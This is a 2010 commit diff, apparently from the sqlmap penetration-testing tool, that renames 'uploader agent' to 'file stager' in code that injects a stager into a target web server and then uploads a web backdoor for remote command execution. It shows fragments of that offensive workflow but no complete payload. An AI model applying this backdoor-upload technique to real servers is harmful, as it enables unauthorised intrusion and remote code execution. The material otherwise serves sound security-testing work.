Minor refactoring

This commit is contained in:
Bernardo Damele 2010-10-17 21:06:52 +00:00
parent 60a1b48194
commit 683184cc8f
5 changed files with 21 additions and 21 deletions

View File

@ -44,7 +44,7 @@ class Web:
self.webApi = None
self.webBaseUrl = None
self.webBackdoorUrl = None
self.webUploaderUrl = None
self.webStagerUrl = None
self.webDirectory = None
def webBackdoorRunCmd(self, cmd):
@ -84,11 +84,11 @@ class Web:
"uploadDir": directory,
page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False)
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the backdoor through "
warnMsg += "the uploader agent on '%s'" % directory
warnMsg += "the file stager on '%s'" % directory
return False
@ -114,12 +114,12 @@ class Web:
remote directory within the web server document root.
if self.webBackdoorUrl is not None and self.webUploaderUrl is not None and self.webApi is not None:
if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
infoMsg = "trying to upload the uploader agent"
infoMsg = "trying to upload the file stager"
message = "which web application language does the web server "
@ -159,12 +159,12 @@ class Web:
backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
originalBackdoorContent = backdoorContent = backdoorStream.read()
uploaderName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi))
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
for directory in directories:
# Upload the uploader agent
self.__webFileInject(uploaderContent, uploaderName, directory)
# Upload the file stager
self.__webFileInject(stagerContent, stagerName, directory)
requestDir = ntToPosixSlashes(directory)
if requestDir[-1] != '/':
@ -180,20 +180,20 @@ class Web:
if requestDir[0] != '/':
requestDir = '/' + requestDir
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName)
self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/"))
uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
self.webStagerUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), stagerName)
self.webStagerUrl = ntToPosixSlashes(self.webStagerUrl.replace("./", "/"))
uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
if "sqlmap file uploader" not in uplPage:
warnMsg = "unable to upload the uploader "
warnMsg += "agent on '%s'" % directory
warnMsg = "unable to upload the file stager "
warnMsg += "on '%s'" % directory
infoMsg = "the uploader agent has been successfully uploaded "
infoMsg += "on '%s' ('%s')" % (directory, self.webUploaderUrl)
infoMsg = "the file stager has been successfully uploaded "
infoMsg += "on '%s' ('%s')" % (directory, self.webStagerUrl)
if self.webApi == "asp":
@ -221,13 +221,13 @@ class Web:
if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
warnMsg = "backdoor hasn't been successfully uploaded "
warnMsg += "with uploader probably because of permission "
warnMsg += "issues."
warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "with file stager probably because of "
warnMsg += "lack of write permission."
message = "do you want to try the same method used "
message += "for uploader? [y/N] "
message += "for the file stager? [y/N] "
getOutput = readInput(message, default="N")
if getOutput in ("y", "Y"):